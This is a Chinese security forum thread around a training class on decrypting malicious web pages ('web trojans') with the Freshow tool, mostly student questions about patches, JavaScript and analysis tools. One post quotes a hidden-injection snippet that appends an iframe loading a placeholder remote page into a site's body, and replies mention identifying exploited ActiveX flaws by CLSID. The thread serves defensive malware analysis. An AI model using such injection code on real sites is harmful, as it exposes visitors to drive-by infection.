瑞星卡卡安全论坛

讲义打包下载在7楼




 附件: 您所在的用户组无法下载或查看附件

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件

 附件: 您所在的用户组无法下载或查看附件

本次网马解密培训着重已freshow工具为主。附件为讲义下载。

附件: 讲义.rar

师父:kaka14:
才讲这么点？

跟着膜拜，学习网马:kaka9:

坐前排:kaka12:

如果我系统补丁 第三方软件漏洞已经全部打齐了 是不是不会中网马了？黑客自己发现的漏洞除外。

就这么点？

:kaka12: 再讲讲对URL的加密啊

理论不会，但是现在时满天飞的0day:kaka12:

排排坐。分果果。(*^__^*)...嘻嘻。。来上课咯:kaka12:

自带小板凳。 坐着听~~:kaka1:

这些工具都怎么用啊？哪个是比较适合我这种菜鸟的？看了半天还是很迷茫啊，望老师讲解:kaka2:

对这方面了解不多，悉心学习。
不才补充一下malzilla的下载地址：http://www.uushare.com/user/roxiel/file/1454388
其中还可以看到Freshow的初级教程。

尽管系统漏洞打上补丁，点击挂马网站自身电脑还是会中毒吧！有时软件也会有漏洞会被黑客利用，用一些安全浏览器具有识别功能的好一点。

学习

.js是什么文件  是不是所有的。js都是网马呢?

如果没有漏洞也禁用了js java等就不会中网页木马了吗？

这些软件除了能得到网页源码还能干什么？

用freshow连卡卡论坛怎么好多乱码？

云里雾里的，该好好学html语言了

老师能不能多讲点呢？:kaka2: 我们现在用什么工具练练手好呢？

没讲加密解密。。。吗

有作业吗？:kaka5:

关于6.隐蔽挂马：（top.document.body.innerHTML = top.document.body.innerHTML+'\r\n<iframe  src="http://www.xxx.com/XX.htm/" \>' ） 后面的"[ /url]"标签，是多打上去的？还是top这段代码就是利用url的方式来实现挂马的？

example：
[url=http://bbs.ikaka.com/top.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe  src="http://www.163.com/" \>']163[/url]

根据CLSID判断漏洞
麻烦请解释一下一串字符中每部分代表什么意思，又是如何知道它所代表的漏洞名称

这堂课貌似内容不多啊，如果能讲一些更具体的就好了。

适合菜鸟用的就是freshow这个工具，第二次课会着重对此工具进行讲解

在一般网马解密过程中，获取到加密源文件中，包含有利用漏洞的clisd值，可根据相应的值通过此表（收录clisd值不全），对比来查询。也可借助搜索引擎来进行查询。